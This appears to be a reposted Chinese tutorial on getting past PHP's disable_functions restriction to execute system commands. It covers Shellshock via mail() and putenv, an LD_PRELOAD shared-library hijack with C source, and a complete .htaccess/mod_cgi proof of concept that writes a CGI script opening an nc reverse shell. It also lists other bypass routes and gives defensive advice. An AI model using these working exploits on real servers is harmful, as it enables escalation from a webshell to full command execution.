欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

PHP通过bypass disable functions执行系统命令的方法汇总

程序员文章站 2023-11-12 19:02:40
一、为什么要bypass disable functions 为了安全起见,很多运维人员会禁用php的一些“危险”函数,例如eval、exec、system等,将其写在p...

一、为什么要bypass disable functions

为了安全起见,很多运维人员会禁用php的一些“危险”函数,例如eval、exec、system等,将其写在php.ini配置文件中,就是我们所说的disable functions了,特别是虚拟主机运营商,为了彻底隔离同服务器的客户,以及避免出现大面积的安全问题,在disable functions的设置中也通常较为严格。

攻与防是对立的,也是互相补充的,既然有对函数的禁用措施,就会有人想方设法的去突破这层限制,我们只有在掌握突破方式以及原理的基础之上,才能更好的去防范这类攻击。

执行系统命令通常是攻击者拿到网站webshell之后想要进一步动作的必然操作,如若不能执行系统命令,接下来的更深入的攻击将很难继续,所以就有了网站管理者禁用类似exec、system之类函数的现象。然而随着技术的不断进步,不断有新的思路出现,单纯的禁用这些函数,某些情况下已经不能阻止攻击者达到执行系统命令的目的了,那么攻击者用什么样的方式突破了disable functions呢?我们又怎样防范这样的攻击呢?

二、 bash漏洞导致的任意命令执行

gnu bash 环境变量远程命令执行漏洞(cve-2014-6271)是gnu bash 的一个远程代码执行漏洞,在这个cve的介绍中,可以看到这样的描述:“gnu bash 4.3及之前版本中存在安全漏洞,该漏洞源于程序没有正确处理环境变量值内的函数定义。远程攻击者可借助特制的环境变量利用该漏洞执行任意代码。以下产品和模块可能会被利用:openssh sshd中的forcecommand功能,apache http server中的mod_cgi和mod_cgid模块,dhcp客户端等”。实际上,php也可以利用这个漏洞做很多事情,甚至有可能直接在80导致远程命令执行。关于这个漏洞的详细情况可以查阅cve-2014-6271的相关资料,此处不再赘述。

下面我们来看一下php到底什么地方能用到bash的这个漏洞呢?其实可以用的地方不止一处,这里我们以mail函数作为例子,其他地方同理,可以自行分析。

php的mail函数提供了3个必选参数和2个可选参数,这里我们主要看最后一个参数,php官方手册上对最后一个参数的说明:

“theadditional_parameters parameter can be used to pass an additional parameter tothe program configured to use when sending mail using the sendmail_pathconfiguration setting. for example, this can be used to set the envelope senderaddress when using sendmail with the -f sendmail option.
theuser that the webserver runs as should be added as a trusted user to thesendmail configuration to prevent a ‘x-warning' header from being added to themessage when the envelope sender (-f) is set using this method. for sendmailusers, this file is /etc/mail/trusted-users. “

简单的说就是这个参数可以通过添加附加的命令作为发送邮件时候的配置,比如使用-f参数可以设置邮件发件人等,官方文档在范例example #3也有所演示,具体可以参考官方文档: http://php.net/manual/zh/function.mail.php 。

在mail函数的源代码mail.c中,我们可以找到如下代码片段:

if (extra_cmd != null) {
       spprintf(&sendmail_cmd, 0,"%s %s", sendmail_path, extra_cmd);
    } else {
       sendmail_cmd = sendmail_path;
    }

如果传递了第五个参数(extra_cmd),则用spprintf将sendmail_path和extra_cmd拼接到sendmail_cmd中(其中sendmail_path就是php.ini中的sendmail_path配置项),随后将sendmail_cmd丢给popen执行:

#ifdef php_win32
    sendmail = popen_ex(sendmail_cmd,"wb", null, null tsrmls_cc);
#else
    /* since popen() doesn't indicate if theinternal fork() doesn't work
    *(e.g. the shell can't be executed) we explicitly set it to 0 to be
    *sure we don't catch any older errno value. */
    errno = 0;
    sendmail = popen(sendmail_cmd,"w");
#endif

如果系统默认sh是bash,popen会派生bash进程,而我们刚才提到的cve-2014-6271漏洞,直接就导致我们可以利用mail()函数执行任意命令,绕过disable_functions的限制。但是这里其实有一个问题,就是extra_cmd在spprintf之前做了安全检查,我当前的php版本是最新的7.2.4,代码位置在mail.c的第371-375行:

 if (force_extra_parameters) {
       extra_cmd =php_escape_shell_cmd(force_extra_parameters);
    } else if (extra_cmd) {
       extra_cmd =php_escape_shell_cmd(zstr_val(extra_cmd));
    }

php_escape_shell_cmd函数会对特殊字符(包括`|*?~<>^()[]{}$\, \x0a and \xff. ‘ 等)进行转义,那这样是不是就没办法了呢?不是的,我们可以通过putenv函数来设置一个包含自定义函数的环境变量,然后通过mail函数来触发,网上早已有poc。

同样调用popen派生进程的php函数还有imap_mail,或者还可能有其他的我们没有发现的函数,所以如果要防范这类攻击,最好的办法就是从根源上入手,修复cve-2014-6271这个bash漏洞。

三、ld_preload:无需bash漏洞

上文说到mail函数利用bash破壳漏洞可以实现突破disable functions的限制执行系统命令,但是像这样的漏洞,一般安全意识稍好一点的运维人员,都会打上补丁了,那么是不是打上补丁之后就一定安全了呢?显然答案是否定的,ld_preload是linux系统的下一个有趣的环境变量:

它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以以向别人的程序注入程序,从而达到特定的目的。

它允许你定义在程序运行前优先加载的动态链接库,我们只要知道这一件事就足够了,这说明什么?这说明我们几乎可以劫持php的大部分函数,还拿上文的mail函数作为例子,上文说过,php的mail函数实际上是调用了系统的sendmail命令,那么我们来看一下sendmail都调用了哪些库函数:

PHP通过bypass disable functions执行系统命令的方法汇总

使用readelf -ws /usr/sbin/sendmail命令来查看,我们发现sendmail函数在运行过程动态调用了很多标准库函数,我们从中随便选取一个库函数geteuid进行测试。

首先我们编写一个自己的动态链接程序,hack.c:

#include<stdlib.h>
#include <stdio.h>    
#include<string.h> 
void payload() {
    system("touch/var/www/html/test");
}  
int geteuid() {
if(getenv("ld_preload") == null) { return 0; }
unsetenv("ld_preload");
payload();
}

当这个共享库中的geteuid被调用时,尝试加载payload()函数,执行命令,在/var/www/html目录下创建一个名字为test的文件。这里实际应用时应该注意编译平台和目标尽量相近,以及注意路径问题,避免不必要的麻烦,这里我们仅仅作为测试,不考虑这些问题。

[[email protected]]# gcc -c -fpic hack.c -o hack
[[email protected]]# gcc -shared hack -o hack.so

我们把hack.so放到web目录,然后编写一个php文件进行测试:

<?php
putenv("ld_preload=/var/www/html/hack.so");
mail("[email protected]","","","","");
?>

我们的/var/www/html/目录下本来只有hack.so和index.php这两个文件,当我们在浏览器中访问index.php页面之后,可以看到目录下又多出了一个test文件,说明我们的系统命令执行成功。

PHP通过bypass disable functions执行系统命令的方法汇总

(ps:笔者实际测试时的环境是vmplayer7+centos7+apache2.4+php7.2.4的环境,测试时遇到一个问题,就是每次刷新访问index.php时,虚拟机的vm进程会疯狂的读写硬盘,几乎独占磁盘的所有活动时间(机械硬盘),导致虚拟机卡顿到连鼠标都无法移动,物理机也因此受到影响明显卡顿,约半小时左右这种情况会突然消失,最终测试结果成功。不知道是什么原因引起这种现象,需要进一步研究,但不在本文讨论范围之内。)

这种绕过行为实施起来很简单,并且目前为止还不受php与linux版本的限制,但是也很容易防御,只要禁用相关的函数(putenv)或者限制对环境变量的传递就可以了,但是要注意对现有业务是否造成影响。

其实对于这个问题,早在2008年就有人向php官方反馈过,只不过php给出的回复是你最好禁用putenv函数: https://bugs.php.net/bug.php?id=46741 ,所以我们有理由相信在后续的php版本中也不会对这个问题有什么针对性的解决方案。

四、.htaccess:不止重定向

大家对.htaccess文件一定不陌生,没错,在apache的web环境中,我们经常会使用.htaccess这个文件来确定某个目录下的url重写规则,特别是一些开源的cms或者框架当中经常会用到,比如著名的开源论坛discuz!,就可以通过.htaccess文件实现url的静态化,大部分php框架,例如thinkphp和laravel,在apache环境下会用.htaccess文件实现路由规则。但是如果.htaccess文件被攻击者修改的话,攻击者就可以利用apache的mod_cgi模块,直接绕过php的任何限制,来执行系统命令。

关于mode_cgi,可以参考apache的官方说明:  http://man.chinaunix.net/newsoft/apachemanual/mod/mod_cgi.html

“任何具有mime类型application/x-httpd-cgi或者被 cgi-script处理器(apache 1.1或以后版本)处理的文件将被作为cgi脚本对待并由服务器运行, 它的输出将被返回给客户端。通过两种途径使文件成为cgi脚本,或者文件具有已由 addtype指令定义的扩展名,或者文件位于 scriptalias目录中。”,这就表示,apache允许web服务器与可执行文件进行交互,这就意味着,你可以用c或者python编写web应用,听起来我们好像可以做任何apache权限用户能做的事情了,那么到底如何实现呢?

首先需要满足几个条件,第一,必须是apache环境,第二,mod_cgi已经启用(在我的环境下是默认启用的),第三,必须允许.htaccess文件,也就是说在httpd.conf中,要注意allowoverride选项为all,而不是none,第四,必须有权限写.htaccess文件。其实这几个条件还是比较容易满足的,满足了以上的条件,就可以“搞事情”了。

在apache的配置中,有一个非常重要的指令,options,options指令是apache配置文件中一个比较常见也比较重要的指令,options指令可以在apache服务器核心配置(server config)、虚拟主机配置(virtual host)、特定目录配置(directory)以及.htaccess文件中使用。options指令的主要作用是控制特定目录将启用哪些服务器特性。关于options指令后可以附加的特性选项的具体作用及含义,可以参考这篇文章: http://www.365mini.com/page/apache-options-directive.htm ,当然我们用到的就是execcgi选项,表示允许使用mod_cgi模块执行cgi脚本。除了options,我们还要配合另外一个addhandler指令来使用,如果你对addhandler不太熟悉没关系,这么解释一下就容易理解多了:addtype我们肯定很熟悉,比如配置apache对php的支持的时候,经常会添加一行类似addtypeapplication/x-httpd-php .php这样的配置,这其实是指定了文件扩展名和内容类型之间的映射关系,而addhandler则是指定扩展名和处理程序之间的关系,也就是说,可以指定某个特定的扩展名的文件,如何来进行处理。

有了options和addhandler,我们就可以随便指定一个特定的文件扩展名以特定的程序来处理,这样思路就很清晰了:先把要执行的程序写入一个特定扩展名的文件里,然后修改.htaccess文件,通过options指令允许使用mod_cgi模块执行cgi脚本,然后再让我们特定的扩展名以cgi-script进行处理,这样我们甚至可以反弹一个shell出来。

poc如下,附注释:

<?php
$cmd = "nc -c'/bin/bash' 127.0.0.1 4444"; //反弹一个shell出来,这里用本地的4444端口
$shellfile ="#!/bin/bash\n"; //指定shell
$shellfile .="echo -ne \"content-type: text/html\\n\\n\"\n"; //需要指定这个header,否则会返回500
$shellfile .="$cmd"; 
functioncheckenabled($text,$condition,$yes,$no) //this surely can be shorter
{
  echo "$text: " . ($condition ?$yes : $no) . "<br>\n";
}
if(!isset($_get['checked']))
{
  @file_put_contents('.htaccess',"\nsetenv htaccess on", file_append); 
  header('location: ' . $_server['php_self']. '?checked=true'); //执行环境的检查
}
else
{
  $modcgi = in_array('mod_cgi',apache_get_modules()); // 检测mod_cgi是否开启
  $writable = is_writable('.'); //检测当前目录是否可写
  $htaccess = !empty($_server['htaccess']);//检测是否启用了.htaccess
    checkenabled("mod-cgienabled",$modcgi,"yes","no");
    checkenabled("iswritable",$writable,"yes","no");
    checkenabled("htaccessworking",$htaccess,"yes","no");
  if(!($modcgi && $writable&& $htaccess))
  {
    echo "error. all of the above mustbe true for the script to work!"; //必须满足所有条件
  }
  else
  {
 checkenabled("backing 
up.htaccess",copy(".htaccess",".htaccess.bak"),"suceeded!saved in 
.htaccess.bak","failed!"); //备份一下原有.htaccess
checkenabled("write 
.htaccessfile",file_put_contents('.htaccess',"options 
+execcgi\naddhandlercgi-script 
.dizzle"),"succeeded!","failed!");//.dizzle,我们的特定扩展名
    checkenabled("write shellfile",file_put_contents('shell.dizzle',$shellfile),"succeeded!","failed!");//写入文件
    checkenabled("chmod777",chmod("shell.dizzle",0777),"succeeded!","failed!");//给权限
    echo "executing the script now.check your listener <img src = 'shell.dizzle' style ='display:none;'>"; //调用
  }
}
?>

我们在本地开nc监听4444端口,然后在浏览器中打开这个页面,如果执行成功,将会反弹一个shell到4444端口:

PHP通过bypass disable functions执行系统命令的方法汇总

当访问poc的时候,成功反弹了一个shell到本地的4444端口,可以看到执行id命令后的回显。

五、其他方式

除上述方式外,在某些特定情况下,还有很多能够绕过php.ini的禁用函数达到执行系统命令目的的方法,但是由于这些方法受到的限制颇多,很少有满足条件的真实环境,所以鉴于篇幅原因,以下只粗略介绍几个其他绕过方式,并提供相关的详细介绍的文章链接,如果有兴趣详细了解,可以参考互联网上的相关资料。

imagemagick

imagemagick是一款使用量很广的图片处理程序,很多厂商包括discuz、drupal、wordpress等常用cms中也调用了imagemagick扩展或imagemagick库进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。在imagemagick6.9.3-9以前的所有版本中都存在一个漏洞,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入,官方在6.9.3-9版本中对漏洞进行了不完全的修复。关于这个漏洞的具体利用和防御方式可以参考:

  。

pcntl_exec

pcntl是linux下的一个扩展,可以支持php的多线程操作。很多时候会碰到禁用exec函数的情况,但如果运维人员安全意识不强或对php不甚了解,则很有可能忽略pcntl扩展的相关函数。

com 组件

windows环境下,当php.ini的设置项com.allow_dcom =true时,可以通过com组件执行系统命令,甚至开启安全模式也可以,相关资料参考: https://www.exploit-db.com/exploits/4553/ 。

win32std

win32std是一个很老的php扩展,其中的win_shell_execute函数可以用来执行windows系统命令: https://www.exploit-db.com/exploits/4218/ 。

六、总结

对于入侵者来说,拿到一个webshell之后,如果想要进一步获取更高的权限或更多的数据和信息,执行系统命令几乎是必须的。当我们在php应用中出现了某些纰漏导致遭到入侵时,如何让损失降到最低就成了首要的问题。从本文已经列举的方法中不难看出只要掌握了这些原理,防范工作是非常简单有效的,只要经常关注安全动态,是完全可以做到对以上绕过措施进行防御的。

以上所述是小编给大家介绍的php通过bypass disable functions执行系统命令的方法汇总,希望对大家有所帮助